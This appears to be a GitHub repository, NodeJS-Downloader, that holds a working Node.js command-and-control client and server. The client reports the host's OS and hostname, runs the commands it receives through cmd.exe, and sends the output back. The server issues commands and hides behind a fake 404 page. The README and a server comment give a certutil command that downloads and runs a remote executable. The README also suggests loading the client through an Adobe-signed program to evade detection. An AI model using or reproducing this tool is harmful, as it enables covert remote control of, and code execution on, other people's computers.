├── 1.png
├── Client.js
├── LICENSE
├── README.md
└── Server.js


/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/3gstudent/NodeJS-Downloader/ffb7a39d662d6849c0213e6286b4ca47e9008bc0/1.png


--------------------------------------------------------------------------------
/Client.js:
--------------------------------------------------------------------------------
  1 | function sleep(milliSeconds){
  2 | 	var startTime =new Date().getTime();
  3 | 	while(new Date().getTime()< startTime + milliSeconds);
  4 | }
  5 | 
  6 | function sendhello(host1,port1,timeinterval){
  7 | 	var os = require('os');	
  8 | 	var os1 = os.type() + ',' + os.release() + ',' + os.platform();
  9 | 	var hostname1 = os.hostname();
 10 | 
 11 | 	var http = require('http');	
 12 | 	var querystring = require('querystring');
 13 |  
 14 | 	var contents = querystring.stringify({
 15 |     		os:os1,
 16 |     		hostname:hostname1,
 17 | 		hello:'hello'	
 18 | 	});
 19 | 
 20 | 	var options = {
 21 |     		host: host1,
 22 |     		port: port1,
 23 |     		path: '/',
 24 |     		method:'POST',
 25 |     		headers:{
 26 |         		'Content-Type':'application/x-www-form-urlencoded',
 27 |         		'Content-Length':contents.length
 28 |     		}
 29 | 	}
 30 | 
 31 | 	var req = http.request(options, function(res){
 32 |     		var data1='';
 33 | 
 34 |     		res.on('data', function(chunk){
 35 |       			data1 += chunk;
 36 |     		});
 37 | 
 38 |     		res.on('end', function(){
 39 |       			console.log('[+]Get command:',data1)
 40 | 			
 41 | 			sendcmd(data1,host1,port1,timeinterval);
 42 |     		});	
 43 | 	});
 44 |  
 45 | 	req.on("error",function(err) {
 46 |     		console.log(err.message);
 47 | 		sleep(timeinterval);
 48 | 		sendhello(serverip,serverport,timeinterval);
 49 | 	});
 50 | 
 51 | 	req.write(contents);
 52 | 	req.end;
 53 | };
 54 | 
 55 | function sendcmd(command,host1,port1,timeinterval) {
 56 | 	dataglobal = '';
 57 | 	var os = require('os');	
 58 | 	var os1 = os.type() + ',' + os.release() + ',' + os.platform();
 59 | 	var hostname1 = os.hostname();
 60 | 	var http = require('http');	
 61 | 	var querystring = require('querystring');
 62 | 	var process = require('child_process');
 63 | 	const bat = process.spawn('cmd.exe', ['/c', command]);
 64 | 	bat.stdout.on('data', (data) => {
 65 | 		dataglobal += data.toString();	
 66 | 	});
 67 | 
 68 | 	bat.stderr.on('data', (data) => {
 69 | 		console.log(data.toString());		
 70 | 	});
 71 | 	bat.on('exit', (code) => {		
 72 | 		var contents = querystring.stringify({
 73 |     			hostname:hostname1,
 74 | 			command:command,
 75 | 			data:dataglobal
 76 | 		});
 77 | 		var options = {
 78 |     			host: host1,
 79 |     			port: port1,
 80 |     			path: '/',
 81 |     			method:'POST',
 82 |     			headers:{
 83 |         			'Content-Type':'application/x-www-form-urlencoded',
 84 |         			'Content-Length':contents.length
 85 |     			}
 86 | 		}
 87 | 		console.log(dataglobal);
 88 | 
 89 | 		var req = http.request(options, function(res){
 90 |     			var data1='';
 91 |     			res.on('data', function(chunk){
 92 |       			data1 += chunk;
 93 |     			});
 94 |     			res.on('end', function(){
 95 |       				console.log('[+]Data:',data1)
 96 |     			});		
 97 | 		});
 98 |  
 99 | 		req.write(contents);
100 | 		req.end;
101 | 
102 | 		req.on("error",function(err) {
103 |     			console.log(err.message);	
104 | 		});
105 | 
106 | 		sleep(timeinterval);
107 | 		sendhello(serverip,serverport,timeinterval);
108 | 	});
109 | }
110 | 
111 | var dataglobal = '';
112 | var serverip = '127.0.0.1';
113 | var serverport = '80';
114 | var timeinterval = +'5000';
115 | 
116 | sendhello(serverip,serverport,timeinterval);
117 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # NodeJS-Downloader
 2 | An example of a downloader written in NodeJS.
 3 | 
 4 | Author:3gstudent
 5 | 
 6 | #### Usage:
 7 | 
 8 | 1. Download the NodeJS:
 9 | 
10 | https://nodejs.org/en/download/
11 | 
12 | You just need node.exe in the file.
13 | 
14 | 2. Set the command sent to the client:
15 | 
16 | Edit the Server.js
17 | 
18 | eg.
19 | 
20 | `var command = 'certutil -urlcache -split -f https://github.com/3gstudent/test/raw/master/putty.exe c:\\a.exe&&c:\\a.exe';`
21 | 
22 | Note:
23 | 
24 | More ways to download & execution：
25 | 
26 | [《渗透技巧——从github下载文件的多种方法》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E4%BB%8Egithub%E4%B8%8B%E8%BD%BD%E6%96%87%E4%BB%B6%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E6%B3%95)
27 | 
28 | 
29 | 3. Start the server
30 | 
31 | ```
32 | node.exe Server.js
33 | ```
34 | 
35 | When you use a browser to access it, it will return 404.
36 | 
37 | 4. Start the client
38 | 
39 | ```
40 | node.exe Client.js
41 | ```
42 | 
43 | It will connect to the server and get the command, then execute the command and send the result again.
44 | 
45 | Client.js can be loaded by a program with a digital signature of Adobe Systems Incorporated.
46 | 
47 | ![Alt text](https://github.com/3gstudent/NodeJS-Downloader/blob/master/1.png?raw=true)
48 | 
49 | Reference:
50 | 
51 | https://bbs.pediy.com/thread-249573.htm
52 | 
53 | 
54 | More details:
55 | 
56 | [《渗透测试中的Node.js——Downloader的实现》](https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Node.js-Downloader%E7%9A%84%E5%AE%9E%E7%8E%B0)
57 | 


--------------------------------------------------------------------------------
/Server.js:
--------------------------------------------------------------------------------
 1 | function getClientIp(req) {
 2 | 	return req.headers['x-forwarded-for'] ||
 3 |         req.connection.remoteAddress ||
 4 |         req.socket.remoteAddress ||
 5 |         req.connection.socket.remoteAddress;
 6 | };
 7 | console.log('NodeJS-Downloader');
 8 | console.log('An example of a downloader written in NodeJS.');
 9 | console.log('Author:3gstudent');
10 | 
11 | //change this
12 | var command = 'whoami';
13 | //var command = 'taskkill /f /im node.exe';
14 | //var command = 'certutil -urlcache -split -f https://github.com/3gstudent/test/raw/master/putty.exe c:\\a.exe&&c:\\a.exe';
15 | console.log('[>]Global Command:',command);
16 | 
17 | var postErrorHTML =
18 |     '<html><head><meta charset="utf-8"><title>Node.js test</title></head>' +
19 |     '<body>' +
20 |     '404 Not Found' +
21 |     '</body></html>';
22 |  
23 | var http = require('http');
24 | var querystring = require('querystring');
25 | var i = +'0'; 
26 | 
27 | http.createServer(function (req, res) {
28 | 	console.log('-----------------------------------------------------');
29 | 	i = i+1;
30 | 	console.log(i);
31 |     	var body = '';
32 | 	var myDate = new Date();
33 | 	var mytime=myDate.toLocaleString();
34 | 
35 | 	console.log('[+]New host');
36 | 	console.log('[*]Time:',mytime);
37 |     	console.log('[*]IP:',getClientIp(req));
38 |     
39 |     	req.on('data', function (chunk) {
40 | 		body += chunk;
41 |     	});
42 | 
43 |     	req.on('end', function () {
44 |         	body = querystring.parse(body);  
45 | 		if(body.os && body.hostname) { 
46 |             		console.log('[*]Hostname:',body['hostname']);
47 | 			console.log('[*]OS:',body['os']);
48 | 			console.log('[+]send commands to host:',command);
49 |         		res.write(command);
50 |  		} else if(body.hostname && body.command && body.data)  {       	
51 |             		console.log('[*]Hostname:',body['hostname']);
52 | 			console.log('[+]result of the command:',body['command']);
53 | 			console.log('*****************************************************');
54 | 			console.log(body['data']);
55 | 			console.log('*****************************************************');			
56 | 			res.write('ok');
57 | 		} else {
58 |      			console.log('[!]bad request');       		
59 | 			res.write(postErrorHTML);     			
60 |         	}
61 |         	res.end();
62 |     	});
63 | }).listen(80,'0.0.0.0');
64 | 


--------------------------------------------------------------------------------